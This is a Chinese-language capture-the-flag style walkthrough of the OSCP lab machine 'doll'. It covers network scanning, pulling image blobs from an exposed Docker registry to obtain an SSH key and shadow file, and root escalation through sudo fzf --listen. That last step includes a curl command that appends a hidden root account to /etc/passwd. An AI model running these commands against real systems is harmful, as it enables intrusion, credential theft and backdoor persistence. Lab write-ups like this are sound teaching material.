OSCP 靶场
靶场介绍
|
doll |
easy |
信息收集、docker 注册表利用、fzf 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
nmap -sV -A -p- -T4 192.168.1.105
目录扫描
dirb http://192.168.1.105:1007
漏洞扫描
使用nikto扫描,发现存在docker 注册表
利用链接参考如下:
https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry#List repositories 列出存储库
curl -s http://192.168.1.105:1007/v2/_catalog
#Get tags of a repository 获取存储库的tags
curl -s http://192.168.1.105:1007/v2/dolly/tags/list
#Get manifests 获取清单
curl -s 192.168.1.105:1007/v2/dolly/manifests/latest
这里重启更换了IP,接着使用如下命令下载bolbs 文件
#Download one of the previously listed blobs
curl http://192.168.1.56:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 --output blob1.tar
#Inspect the insides of each blob
tar -xf blob1.tar
发现home 目录存在id_rsa,etc目录存在shadow文件
或者直接使用脚本dump获取
权限获取
使用id_rsa 私钥进行登录,发现需要key,输入list 里面获取的password 进行验证成功登录到ssh
权限提升
sudo -l 查看可免密执行fzf 命令,fzf 是一个通用的命令行模糊搜索工具,用 golang 编写,大家的评价都是目前最快的 fuzzy finder,配合 ag 的使用,依靠模糊的关键词,可以快速定位文件。配合一些脚本,可以完全颠覆以前使用命令行的工作方式。
项目地址:https://github.com/junegunn/fzf
我们可以通过fzf 监听1337 端口执行命令进行提取,步骤如下:
1、首先使用ssh 转发本地1337端口到靶机1337
2、靶机上监听kali 传来的命令
bela@doll:~$ sudo /usr/bin/fzf --listen=13373、kali 执行命令
┌──(root㉿kali)-[/tmp]
└─# curl -X POST 127.0.0.1:1337 -d 'execute(id)'
4、我们可以执行反弹shell,或者添加隐藏用户,或者给bash 添加suid 权限等
curl -X POST 127.0.0.1:1337 -d 'execute(echo "mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash" >> /etc/passwd)'
上面我们通过添加隐藏账户提权到root 权限
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】DOLL
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论